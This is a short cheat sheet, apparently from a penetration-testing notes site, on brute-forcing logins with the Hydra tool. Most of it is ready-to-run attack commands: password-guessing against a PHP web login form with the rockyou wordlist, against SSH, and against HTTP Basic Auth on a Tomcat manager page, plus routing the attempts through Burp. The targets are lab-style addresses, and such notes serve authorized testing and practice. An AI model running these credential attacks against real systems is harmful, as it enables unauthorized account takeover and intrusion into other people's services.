Hydra Brute Forcing

Brute forcing web form login

hydra -l john -P rockyou.txt 192.168.133.148 http-post-form "/checklogin.php:username=^USER^&password=^PASS^&Login=Login:F=Wrong Username or Password" -V

Brute forcing protocol login

hydra -L <login list> -P <password list> <protocol>

E.g.

hydra -L users.txt -P creds.txt ssh://10.10.10.7

-l

Login name

-L

Login list

-p

Password

-P

Password list

Brute Force Basic Auth

<username>:<password>

GET

hydra -C <wordlist> -s <port> <ip> http-get <URI>

e.g.

hydra -C /usr/share/wordlists/hack/hacklist.txt -s 8080 10.10.10.95 http-get /manager/html

Intercept with Burp

HYDRA_PROXY_HTTP=127.0.0.1:8080 hydra <params>

- filter out 4xx in Burp to see only the successful login attempts

https://infinitelogins.com/2020/02/22/how-to-brute-force-websites-using-hydra/

PreviousPwnKit - CVE- 2021-4034NextWFUZZ Brute Forcing

Last updated